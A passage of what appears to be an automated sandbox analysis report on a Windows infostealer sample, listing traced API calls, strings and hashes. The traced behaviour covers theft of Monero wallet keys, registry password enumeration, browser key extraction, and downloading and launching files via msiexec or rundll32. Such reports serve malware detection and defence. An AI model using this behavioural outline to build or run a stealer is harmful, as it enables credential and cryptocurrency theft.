                      Function 00479010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0047906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: a729aae8013263e62df6b2446a9a3ddda79ef6cdde96fda19e87b1abb5e7004c
                      • Instruction ID: ccf3dae6ecc145a86f074a43c2f121ac8cac2f5296177acc83325aedb57c42b0
                      • Opcode Fuzzy Hash: a729aae8013263e62df6b2446a9a3ddda79ef6cdde96fda19e87b1abb5e7004c
                      • Instruction Fuzzy Hash: 3271DE75910208ABDB04EFE4DC89FEEB7B9BF48704F14850AF516A7290DB38A905CF65
                      Function 00472E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 004731C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0047335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 004734EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: d80802d6855dd0a23d2ca095c48af07bbcb174479468df53f22769ea7b49dc4d
                      • Instruction ID: 9e279c51d7742319016c4ccf7a7af749f50f8c1b180361274b24ab4b048bf8a8
                      • Opcode Fuzzy Hash: d80802d6855dd0a23d2ca095c48af07bbcb174479468df53f22769ea7b49dc4d
                      • Instruction Fuzzy Hash: 401243B18101089ADB15FBA1CC52FEEB738AF54304F50855FF50A66091EF382B5ACF6A
                      Function 004752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 00466280: InternetOpenA.WININET(00480DFE,00000001,00000000,00000000,00000000), ref: 004662E1
                        • Part of subcall function 00466280: StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00466303
                        • Part of subcall function 00466280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00466335
                        • Part of subcall function 00466280: HttpOpenRequestA.WININET(00000000,GET,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00466385
                        • Part of subcall function 00466280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004663BF
                        • Part of subcall function 00466280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004663D1
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00475318
                      • lstrlen.KERNEL32(00000000), ref: 0047532F
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00475364
                      • lstrlen.KERNEL32(00000000), ref: 00475383
                      • lstrlen.KERNEL32(00000000), ref: 004753AE
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 13c43f5fe7df8c73ecc01d66f95c7a6805e2c050017e8aacae5ad8d372bbb951
                      • Instruction ID: 2fe3e902d6bc792922afbe2e9f74344d5b77ce85c7558575e8d4d654de74190b
                      • Opcode Fuzzy Hash: 13c43f5fe7df8c73ecc01d66f95c7a6805e2c050017e8aacae5ad8d372bbb951
                      • Instruction Fuzzy Hash: 92514330910108ABCB14FF61CD92AEE7779AF50309F50841EF40E5A591EF786B56CBAB
                      Function 004712D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: 581cf106cdf9f35ded2018c60a2b4e3621f3fd44cf80e0acdbb14573dee8467a
                      • Instruction ID: 2b6689e10eefd8bc022c23e885896fa8661ce6b14fd2b9135fd77e8b6b3e9d36
                      • Opcode Fuzzy Hash: 581cf106cdf9f35ded2018c60a2b4e3621f3fd44cf80e0acdbb14573dee8467a
                      • Instruction Fuzzy Hash: 5DC1A3B59001099BCB14FF60DC89FEE7379BB94304F00859EE50E67141DB78AA95CFA5
                      Function 00474280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 004742EC
                      • lstrcat.KERNEL32(?,00E8DCC8), ref: 0047430B
                      • lstrcat.KERNEL32(?,?), ref: 0047431F
                      • lstrcat.KERNEL32(?,00E8C9D0), ref: 00474333
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 00478D90: GetFileAttributesA.KERNEL32(00000000,?,00461B54,?,?,0048564C,?,?,00480E1F), ref: 00478D9F
                        • Part of subcall function 00469CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00469D39
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                        • Part of subcall function 004793C0: GlobalAlloc.KERNEL32(00000000,004743DD,004743DD), ref: 004793D3
                      • StrStrA.SHLWAPI(?,00E8DB30), ref: 004743F3
                      • GlobalFree.KERNEL32(?), ref: 00474512
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469AEF
                        • Part of subcall function 00469AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00464EEE,00000000,?), ref: 00469B01
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469B2A
                        • Part of subcall function 00469AC0: LocalFree.KERNEL32(?,?,?,?,00464EEE,00000000,?), ref: 00469B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 004744A3
                      • StrCmpCA.SHLWAPI(?,004808D1), ref: 004744C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 004744D2
                      • lstrcat.KERNEL32(00000000,?), ref: 004744E5
                      • lstrcat.KERNEL32(00000000,00480FB8), ref: 004744F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: 28279776cabc1d4b6d058a3d91639426b05e1fde34f0572c290f56b89104b9c0
                      • Instruction ID: 0a98901c140edc3090691ee55678df183ff54ed2574f89fce41458141683916c
                      • Opcode Fuzzy Hash: 28279776cabc1d4b6d058a3d91639426b05e1fde34f0572c290f56b89104b9c0
                      • Instruction Fuzzy Hash: 6F7137B6900108A7CB54FBE0DC85FEE7379AB88304F04859DF60996181EB78EB55CF95
                      Function 00461310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004612B4
                        • Part of subcall function 004612A0: RtlAllocateHeap.NTDLL(00000000), ref: 004612BB
                        • Part of subcall function 004612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004612D7
                        • Part of subcall function 004612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004612F5
                        • Part of subcall function 004612A0: RegCloseKey.ADVAPI32(?), ref: 004612FF
                      • lstrcat.KERNEL32(?,00000000), ref: 0046134F
                      • lstrlen.KERNEL32(?), ref: 0046135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00461377
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00461465
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 004614EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 5d8137543c0bf2ed232dbeb4a48b52dde378563b0e0736c8494cb45adf6226a1
                      • Instruction ID: 7e56af70f846b3dfe2bc7b7b61028d80b1d4ab14262a72d0f5d05e022d499ac7
                      • Opcode Fuzzy Hash: 5d8137543c0bf2ed232dbeb4a48b52dde378563b0e0736c8494cb45adf6226a1
                      • Instruction Fuzzy Hash: 855154B1D1011957CB15FB61DD92BEE733CAB54304F40459EB20E62091EE386B99CFAA
                      Function 004675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0046733A
                        • Part of subcall function 004672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004673B1
                        • Part of subcall function 004672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0046740D
                        • Part of subcall function 004672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00467452
                        • Part of subcall function 004672D0: HeapFree.KERNEL32(00000000), ref: 00467459
                      • lstrcat.KERNEL32(00000000,004817FC), ref: 00467606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00467648
                      • lstrcat.KERNEL32(00000000, : ), ref: 0046765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 0046768F
                      • lstrcat.KERNEL32(00000000,00481804), ref: 004676A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 004676D3
                      • lstrcat.KERNEL32(00000000,00481808), ref: 004676ED
                      • task.LIBCPMTD ref: 004676FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                      • String ID: :
                      • API String ID: 2677904052-3653984579
                      • Opcode ID: 4de6a26af43400352b5a83940b09ab4975e8d668481999a0cf4724fc338fd541
                      • Instruction ID: 6b15ab5fc1ace41a475f91619ed96a094a849e6a0a5a92838f6c587c8a159388
                      • Opcode Fuzzy Hash: 4de6a26af43400352b5a83940b09ab4975e8d668481999a0cf4724fc338fd541
                      • Instruction Fuzzy Hash: 16316B71A00109DBCB08FBE5DC95DFE737ABB45305B14551EE102A72A0EB38A942CF66
                      Function 00478100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E8DA10,00000000,?,00480E2C,00000000,?,00000000), ref: 00478130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00478137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00478158
                      • __aulldiv.LIBCMT ref: 00478172
                      • __aulldiv.LIBCMT ref: 00478180
                      • wsprintfA.USER32 ref: 004781AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: af2b59f69bd8a45b7adcddad919524f0c41d6fa9ca7792cceefdaa81e021ce07
                      • Instruction ID: 4784acecd9d57207d80e8e9865fbd68bb60a9e09460a3dbc8bb590dbe8701a64
                      • Opcode Fuzzy Hash: af2b59f69bd8a45b7adcddad919524f0c41d6fa9ca7792cceefdaa81e021ce07
                      • Instruction Fuzzy Hash: 23210EB1D44218ABDB00DFD5CC49FAEB779FB44B14F10851AF605BB280D77869018BA9
                      Function 004660A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                        • Part of subcall function 004647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                      • InternetOpenA.WININET(00480DF7,00000001,00000000,00000000,00000000), ref: 0046610F
                      • StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00466147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0046618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004661B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 004661DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0046620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00466249
                      • InternetCloseHandle.WININET(?), ref: 00466253
                      • InternetCloseHandle.WININET(00000000), ref: 00466260
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
